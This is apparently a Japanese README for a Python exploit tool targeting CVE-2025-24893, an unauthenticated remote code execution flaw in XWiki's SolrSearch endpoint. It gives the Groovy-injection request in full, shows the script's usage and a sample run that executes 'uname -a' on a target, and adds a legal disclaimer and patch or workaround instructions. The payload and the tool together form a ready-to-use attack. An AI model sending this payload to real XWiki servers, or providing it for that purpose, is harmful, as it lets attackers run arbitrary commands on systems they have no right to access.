
CVE-2025-24893 は、XWiki Platform に影響を及ぼす重大な未認証リモートコード実行 (RCE) 脆弱性です。
この欠陥により、認証を必要とせずに、ゲストユーザーが SolrSearch エンドポイントへの特別に細工された RSS リクエストを介して、任意の Groovy コード を注入・実行できます。
これは影響を受けるシステムの機密性、完全性、可用性に直接影響します。
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H⚠️ 免責事項:
このコードは教育および研究目的専用です。明示的な許可なくシステムに対して使用すると、法律違反となる可能性があります。
作者は、本ツールの不正使用や悪意のある活動について一切責任を負いません。
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}println("Hello from search text:42"){{/groovy}}{{/async}}
このセクションでは、CVE-2025-24893 を利用する Python エクスプロイトスクリプトのセットアップと実行方法について説明します。
❯ python3 CVE-2025-24893.py
usage: CVE-2025-24893.py [-h] -u URL -c COMMAND
CVE-2025-24893.py: error: the following arguments are required: -u/--url, -c/--command
❯ python3 CVE-2025-24893.py -u http://10.10.10.10:8080 -c 'uname -a'
[*] Sending payload to: http://10.10.10.10:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln("uname -a".execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d
[+] Command output 'uname -a':
Linux 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
脆弱性を修正するには、XWiki を以下のいずれかのバージョンに更新してください。
直ちに更新できない場合は、以下の一時的な修正を適用できます。
SolrSearchMacros.xml ファイル (Main.SolrSearchMacros に配置) の 955 行目 付近を編集します。application/xml に設定した rawResponse マクロを使用するように置き換えます。macros.vm の 2824 行目 にある実装を使用してください。参照: